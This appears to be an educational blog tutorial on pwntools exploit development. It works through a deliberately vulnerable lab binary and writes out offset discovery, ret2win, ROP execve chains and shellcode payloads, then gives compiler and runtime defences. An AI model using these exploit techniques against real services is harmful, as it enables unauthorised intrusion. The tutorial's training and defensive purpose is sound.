Writing Exploits with pwntools: From cyclic to ROP and shellcode


Disclaimer: This article is for education and authorized security testing only. Run the techniques shown here exclusively against binaries you own or are explicitly permitted to test (CTF challenges, your own lab VMs, scoped engagements). Exploiting systems without written authorization is illegal in virtually every jurisdiction.

Table of contents

Introduction / Overview
How it works / Background
Prerequisites / Lab setup
Walkthrough / PoC
Detection & Defense (Blue Team)
Conclusion
References

Introduction / Overview

pwntools is the de facto standard CTF and exploit-development framework for Python. Instead of hand-rolling socket code, struct packing, and offset math for every challenge, it gives you a coherent API: remote() for the network, ELF() for symbol resolution, p64()/u64() for packing, cyclic() for offset discovery, the ROP object for gadget chaining, and shellcraft for assembly generation.

This post walks through a complete workflow against a deliberately vulnerable 64-bit Linux binary, then gives equal time to the blue-team side: how the bugs we abuse are detected and how modern mitigations defeat them.

How it works / Background

A classic stack-based buffer overflow occurs when a program writes more data into a fixed-size stack buffer than it can hold, overwriting the saved return address. On x86-64 Linux, control flow is hijacked when the overwritten return address is popped into RIP at the ret instruction.
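
To make the layout concrete, here is a toy model in plain Python (no pwntools required). It assumes the frame of the vuln() function built later in this post: a 64-byte buffer, then the 8-byte saved RBP, then the 8-byte saved return address. All addresses are made up for illustration, and a real compiler may add padding that this sketch ignores.

```python
import struct

BUF_SIZE = 64                  # char buf[64]
SAVED_RBP = 0x7FFDEADBE000     # hypothetical frame pointer
SAVED_RIP = 0x401234           # hypothetical return address into main()


def make_frame() -> bytearray:
    """Model the frame from low to high addresses: buffer | saved RBP | saved RIP."""
    return bytearray(BUF_SIZE) + struct.pack('<QQ', SAVED_RBP, SAVED_RIP)


def unchecked_read(frame: bytearray, data: bytes, limit: int = 512) -> None:
    """Mimic read(0, buf, 512): copy up to `limit` bytes with no bounds check."""
    data = data[:limit]
    frame[0:len(data)] = data  # anything past BUF_SIZE spills into RBP and RIP


def saved_rip(frame: bytearray) -> int:
    """Return the value that ret would load into RIP."""
    return struct.unpack_from('<Q', frame, BUF_SIZE + 8)[0]


frame = make_frame()
unchecked_read(frame, b'A' * 72 + struct.pack('<Q', 0x401156))
print(hex(saved_rip(frame)))   # prints 0x401156
```

Writing 64 bytes or fewer leaves the saved return address untouched; the 73rd through 80th bytes are the ones that decide where ret goes.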

Modern targets ship mitigations that shape the exploit:

NX / DEP marks the stack non-executable, so you can't just jump to shellcode on the stack — you pivot to ROP (Return-Oriented Programming), chaining existing executable gadgets that end in ret.
ASLR randomizes library/stack base addresses, so you typically need an information leak first.
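Stack canaries place a random value between the local buffers and the saved frame pointer and return address; the function epilogue checks it before ret and calls __stack_chk_fail if it was overwritten.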

pwntools doesn't bypass mitigations for you, but it removes nearly all the boilerplate involved in constructing each stage. Check protections quickly with the bundled checksec:

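checksec --file=./vuln
# Output from the pwntools checksec resembles (exact lines vary by version):
#   RELRO:    Partial RELRO
#   Stack:    No canary found
#   NX:       NX enabled
#   PIE:      No PIE (0x400000)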

Prerequisites / Lab setup

Install pwntools into a virtualenv and grab the helper CLI tools:

python3 -m venv .venv && source .venv/bin/activate
pip install pwntools          # pulls in pwn, checksec, cyclic, ROPgadget deps

Build a small vulnerable target. NX is on, PIE and the canary are off so we can focus on the core APIs:

cat > vuln.c <<'EOF'
#include <stdio.h>
#include <unistd.h>
void win() { execve("/bin/sh", 0, 0); }   // present but not called
void vuln() { char buf[64]; read(0, buf, 512); }
int main() { setvbuf(stdout, 0, 2, 0); vuln(); return 0; }
EOF

gcc -fno-stack-protector -no-pie -o vuln vuln.c

Expose it on a port to mimic a remote service:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:./vuln

Walkthrough / PoC

Step 1 — Find the offset with cyclic

cyclic(length) generates a De Bruijn sequence in which every 4-byte substring is unique (pass n=8 for 8-byte substrings). Feed it in, read the faulting value out of the core dump or debugger, and cyclic_find() returns the exact offset.

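from pwn import *

context.update(arch='amd64', os='linux', log_level='info')

io = process('./vuln')
io.send(cyclic(200))
io.wait()                            # let the process crash

# Requires core dumps to be enabled (e.g. ulimit -c unlimited).
core = io.corefile
# On x86-64 the ret faults on the non-canonical address before RIP changes,
# so the pattern bytes are still sitting at RSP.
fault = core.read(core.rsp, 8)
offset = cyclic_find(fault[:4])      # 4-byte chunk for the lookup
log.success(f'offset to saved RIP = {offset}')   # -> 72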

That 72 (64-byte buffer + 8-byte saved RBP) is the distance to the return address.
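
For intuition about why the lookup works, the sketch below generates a De Bruijn sequence in plain Python and finds an offset by substring search. It illustrates the idea rather than reproducing pwntools' own code: the helper names pattern() and pattern_find() are hypothetical, and the lowercase alphabet with 4-byte windows is an assumption chosen to mirror the defaults used above.

```python
from itertools import islice
from string import ascii_lowercase


def de_bruijn(alphabet: bytes, n: int):
    """Lazily yield a De Bruijn sequence in which every n-byte window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length: int, n: int = 4) -> bytes:
    """Return the first `length` bytes of the sequence."""
    return bytes(islice(de_bruijn(ascii_lowercase.encode(), n), length))


def pattern_find(chunk: bytes, n: int = 4, limit: int = 10000) -> int:
    """Return the offset of the first n bytes of `chunk`, or -1 if absent."""
    return pattern(limit, n).find(chunk[:n])


data = pattern(200)
fault = data[72:80]            # what would sit at RSP after the crash
print(pattern_find(fault))     # prints 72
```

Because no 4-byte window repeats, a single substring search is enough to turn the bytes found at the crash site back into a unique offset.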

Step 2 — Resolve symbols with ELF

Because PIE is disabled, win() lives at a fixed address. ELF() parses the symbol table so you never hardcode addresses:

elf = ELF('./vuln')
win_addr = elf.symbols['win']
log.info(f'win() @ {hex(win_addr)}')

Step 3 — Pack the payload with p64

p64() packs an integer little-endian into 8 bytes (its inverse is u64()). The first version just redirects execution to win():

payload  = b'A' * offset
payload += p64(win_addr)

io = remote('127.0.0.1', 1337)   # the network endpoint
io.sendline(payload)
io.interactive()                 # drop into the shell

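If the process instead crashes on a MOVAPS instruction inside libc (most often seen when the target calls system() rather than execve directly), prepend a bare ret gadget so that RSP is 16-byte aligned at the call. This is a very common gotcha on modern glibc.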
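
To see what the packing helpers do under the hood, the following stdlib-only sketch reproduces 64-bit little-endian packing with struct and lays out the Step 3 payload, optionally with an alignment ret in front. The function names and both addresses are placeholders invented for illustration; in a real script the addresses would come from ELF() and a gadget search.

```python
import struct


def pack64(value: int) -> bytes:
    """Little-endian 8-byte packing, the same byte layout p64() produces."""
    return struct.pack('<Q', value)


def unpack64(data: bytes) -> int:
    """Inverse of pack64(); expects exactly 8 bytes."""
    return struct.unpack('<Q', data)[0]


def build_ret2win(offset: int, win_addr: int, ret_gadget=None) -> bytes:
    """Padding up to the saved return address, then the new return target."""
    payload = b'A' * offset
    if ret_gadget is not None:
        # An extra ret pops 8 bytes, shifting RSP to restore 16-byte alignment.
        payload += pack64(ret_gadget)
    payload += pack64(win_addr)
    return payload


WIN_ADDR = 0x401156      # hypothetical address of win()
RET_GADGET = 0x40101A    # hypothetical address of a lone ret instruction

plain = build_ret2win(72, WIN_ADDR)
aligned = build_ret2win(72, WIN_ADDR, RET_GADGET)
print(plain[72:].hex())  # prints 5611400000000000
print(len(aligned))      # prints 88
```

The hex dump shows why packing matters: the least significant byte comes first, so pasting the address as text would not work.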

Step 4 — Build a chain with ROP

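Redirecting to a function that takes no arguments is trivial; real targets need arguments. The ROP object auto-discovers gadgets and assembles the chain. Here we call execve("/bin/sh", NULL, NULL) ourselves rather than relying on a convenient win(). Because libc is loaded at a randomized base under ASLR, the chain is only valid once libc.address has been set from a leak (or when ASLR is disabled in the lab):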

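libc = elf.libc                    # the linked libc ELF object
# With ASLR on, rebase libc before building the chain, for example:
# libc.address = leaked_libc_base  # hypothetical value from an info leak
rop  = ROP([elf, libc])

binsh = next(libc.search(b'/bin/sh\x00'))
rop.execve(binsh, 0, 0)            # pwntools picks pop rdi/rsi/rdx gadgets
print(rop.dump())                  # human-readable gadget chain

payload = flat({offset: rop.chain()})
io.sendline(payload)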

flat() builds the buffer by placing rop.chain() at byte offset offset and padding the gap before it with filler bytes (a cyclic pattern by default, not zeros; pass filler= to change it). rop.dump() prints each gadget address and its effect, which is invaluable when a chain misbehaves.
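
The layout that flat() and the ROP object produce can be approximated by hand. The sketch below is stdlib-only and uses made-up gadget and symbol addresses. place() is a hypothetical helper that imitates the dictionary form of flat() with a fixed filler byte, and the chain assumes the target happens to contain pop rdi, pop rsi, and pop rdx gadgets, which is not guaranteed for a given binary.

```python
import struct


def place(chunks: dict, filler: bytes = b'A') -> bytes:
    """Put each bytes value at its byte offset, padding gaps with `filler`."""
    out = bytearray()
    for offset, data in sorted(chunks.items()):
        if offset < len(out):
            raise ValueError(f'chunk at offset {offset} overlaps earlier data')
        out += filler * (offset - len(out))
        out += data
    return bytes(out)


def chain(*words: int) -> bytes:
    """Concatenate 64-bit little-endian words in the order ret will consume them."""
    return b''.join(struct.pack('<Q', w) for w in words)


# Hypothetical addresses, for illustration only.
POP_RDI = 0x401203   # pop rdi; ret
POP_RSI = 0x401201   # pop rsi; ret
POP_RDX = 0x4011FF   # pop rdx; ret
BINSH = 0x402004     # address of the "/bin/sh" string
EXECVE = 0x401040    # address of execve

rop_chain = chain(POP_RDI, BINSH, POP_RSI, 0, POP_RDX, 0, EXECVE)
payload = place({72: rop_chain})
print(len(payload))  # prints 128
```

Each gadget address is followed by the value it pops, so the stack reads as a list of (gadget, argument) pairs ending in the function to call.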

Step 5 — Generate shellcode with shellcraft

When the stack is executable (no NX), skip ROP entirely and let shellcraft emit architecture-specific assembly that asm() turns into bytes:

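context.arch = 'amd64'
sc = shellcraft.amd64.linux.sh()   # /bin/sh execve stub as assembly
shellcode = asm(sc)
log.info(f'shellcode is {len(shellcode)} bytes')

# stack_buf_addr is the runtime address of buf. It is not defined above and
# must come from a debugger or an information leak.
payload = shellcode.ljust(offset, b'\x90') + p64(stack_buf_addr)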

shellcraft.amd64.linux.sh() returns the assembly text; asm() assembles it. There are dozens of templates (cat, connect, bind, dupsh) under shellcraft.<arch>.linux.
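
One detail worth guarding against: bytes.ljust() never truncates, so if the shellcode is longer than offset, the return address silently lands in the wrong place. A small stdlib-only sketch of a checked layout follows. The function name, the placeholder bytes standing in for real shellcode, and the buffer address are all assumptions for illustration.

```python
import struct

NOP = b'\x90'


def shellcode_payload(shellcode: bytes, offset: int, buf_addr: int) -> bytes:
    """Shellcode at the start of the buffer, NOP padding, then the return address."""
    if len(shellcode) > offset:
        raise ValueError(
            f'shellcode is {len(shellcode)} bytes but only {offset} fit '
            'before the saved return address'
        )
    return shellcode.ljust(offset, NOP) + struct.pack('<Q', buf_addr)


fake_shellcode = b'\xcc' * 48   # int3 placeholders, not a working payload
payload = shellcode_payload(fake_shellcode, 72, 0x7FFFFFFFE000)
print(len(payload))             # prints 80
```

With pwntools available, the same check can sit directly in front of the ljust() call in the snippet above.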

End-to-end exploit flow

[Diagram 1: end-to-end exploit flow]

The diagram shows the decision points: NX steers you between raw shellcode and ROP, while ASLR decides whether you need a leak before finalizing the payload.
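
Those two decision points can also be written as a small function. This is a reading of the prose above rather than a reproduction of the diagram; plan_exploit() is a hypothetical name, and the step labels are descriptive strings, not pwntools calls.

```python
def plan_exploit(nx: bool, aslr: bool) -> list:
    """Return the ordered stages implied by the target's NX and ASLR settings."""
    steps = ['find the offset with cyclic']
    if aslr:
        # Randomized addresses must be recovered before they can be packed.
        steps.append('leak an address')
    if nx:
        steps.append('build a ROP chain')
    else:
        steps.append('place shellcode on the stack')
    steps.append('send the payload')
    return steps


for stage in plan_exploit(nx=True, aslr=True):
    print(stage)
```

For the lab binary in this post (NX on, no PIE), the ret2win case in Step 3 needs no leak because win() sits at a fixed address in the main binary; the libc-based chain in Step 4 is where the ASLR branch applies.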

Detection & Defense (Blue Team)

These attacks leave both build-time and run-time signals. Defenders should invest in prevention as heavily as attackers invest in exploitation.

Compile and link with all mitigations enabled. The protections our lab binary switched off are exactly the ones you want on in production:

gcc -fstack-protector-strong -D_FORTIFY_SOURCE=2 -O2 \
    -fPIE -pie -Wl,-z,relro,-z,now -Wl,-z,noexecstack \
    -o app app.c

Stack canaries (-fstack-protector-strong) abort on a clobbered canary before ret, defeating the simple overflow in Step 3.
Full RELRO (-z relro -z now) makes the GOT read-only, blocking GOT-overwrite chains.
PIE + ASLR (-fPIE -pie) randomizes the base, so the static ELF.symbols addresses in Step 2/4 are no longer valid without a leak. Confirm system ASLR with cat /proc/sys/kernel/randomize_va_space (should be 2).
NX / noexecstack forces attackers off the shellcode path in Step 5.
FORTIFY_SOURCE swaps unbounded calls for length-checked variants and can catch the read-into-fixed-buffer pattern at runtime.

Detection and runtime hardening:

Run checksec across your build artifacts in CI and fail the pipeline on missing mitigations.
Enable Control-Flow Integrity (-fcf-protection / Intel CET) and compiler-based CFI so ROP ret/indirect-jump targets are validated.
Audit for unsafe APIs (gets, strcpy, unbounded read/scanf("%s")) with static analyzers and _FORTIFY_SOURCE warnings.
Monitor for crash storms: repeated SIGSEGV in dmesg/journald or core dumps on a network service strongly indicate fuzzing or offset discovery (the Step 1 phase). Ship core-dump and segfault events to your SIEM.
Map activity to MITRE ATT&CK T1203 (Exploitation for Client Execution) and T1068 (Exploitation for Privilege Escalation) for alerting and threat-hunting coverage.
Sandbox network-facing parsers with seccomp-bpf to deny execve, neutralizing both the shellcraft and rop.execve() payloads even on a successful hijack.
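
As a starting point for the CI check mentioned above, here is a minimal stdlib-only sketch that reads two mitigations straight from a little-endian ELF64 file: PIE (from e_type) and NX (from the PT_GNU_STACK program header). It is deliberately incomplete. Canary and RELRO detection need symbol and dynamic-section parsing, which a tool such as checksec already handles. The function names are hypothetical, and fake_elf() only builds a synthetic header so the example runs without a real binary.

```python
import struct

ET_DYN = 3                   # e_type of PIE executables (and shared objects)
PT_GNU_STACK = 0x6474E551    # program header describing stack permissions
PF_X = 0x1                   # executable flag


def mitigations(data: bytes) -> dict:
    """Report PIE and NX for a little-endian ELF64 image."""
    if data[:4] != b'\x7fELF' or data[4] != 2 or data[5] != 1:
        raise ValueError('expected a little-endian ELF64 file')
    (e_type,) = struct.unpack_from('<H', data, 16)
    (e_phoff,) = struct.unpack_from('<Q', data, 32)
    e_phentsize, e_phnum = struct.unpack_from('<HH', data, 54)
    nx = False               # assumption: a missing PT_GNU_STACK counts as not NX
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from('<II', data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {'pie': e_type == ET_DYN, 'nx': nx}


def missing(data: bytes) -> list:
    """Names of the checked mitigations that are absent; empty means pass."""
    return sorted(name for name, on in mitigations(data).items() if not on)


def fake_elf(e_type: int, stack_flags: int) -> bytes:
    """Synthetic ELF header plus one PT_GNU_STACK entry, for demonstration only."""
    ident = b'\x7fELF' + bytes([2, 1, 1]) + bytes(9)
    header = ident + struct.pack('<HHIQQQIHHHHHH',
                                 e_type, 0x3E, 1, 0, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    phdr = struct.pack('<IIQQQQQQ', PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0)
    return header + phdr


print(missing(fake_elf(e_type=2, stack_flags=6)))   # prints ['pie']
print(missing(fake_elf(e_type=3, stack_flags=6)))   # prints []
```

In a pipeline, the input would be the bytes of each build artifact, and a non-empty result would fail the job.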

For deeper static triage of an unknown binary before any of this, see Reverse Engineering with Ghidra and Defeating ASLR with Information Leaks.

Conclusion

pwntools collapses the exploit lifecycle into a handful of composable primitives: remote() for I/O, cyclic() for offsets, ELF()/p64() for symbols and packing, ROP for gadget chains, and shellcraft for shellcode. The same workflow scales from a 64-byte CTF overflow to real CVE research. Equally, every step we leaned on maps to a mitigation a defender can enable today — canaries, RELRO, PIE/ASLR, NX, CFI, and seccomp — which is exactly why understanding both sides matters. Practice on intentionally vulnerable targets first; see also Building a Local Pwn Lab.

References

pwntools documentation — https://docs.pwntools.com/
pwntools source (Gallopsled) — https://github.com/Gallopsled/pwntools
HackTricks: Stack Overflow & ROP — https://book.hacktricks.xyz/binary-exploitation/stack-overflow
MITRE ATT&CK T1203 — https://attack.mitre.org/techniques/T1203/
MITRE ATT&CK T1068 — https://attack.mitre.org/techniques/T1068/
ROPgadget — https://github.com/JonathanSalwan/ROPgadget
GCC security flags / FORTIFY_SOURCE — https://www.gnu.org/software/libc/manual/
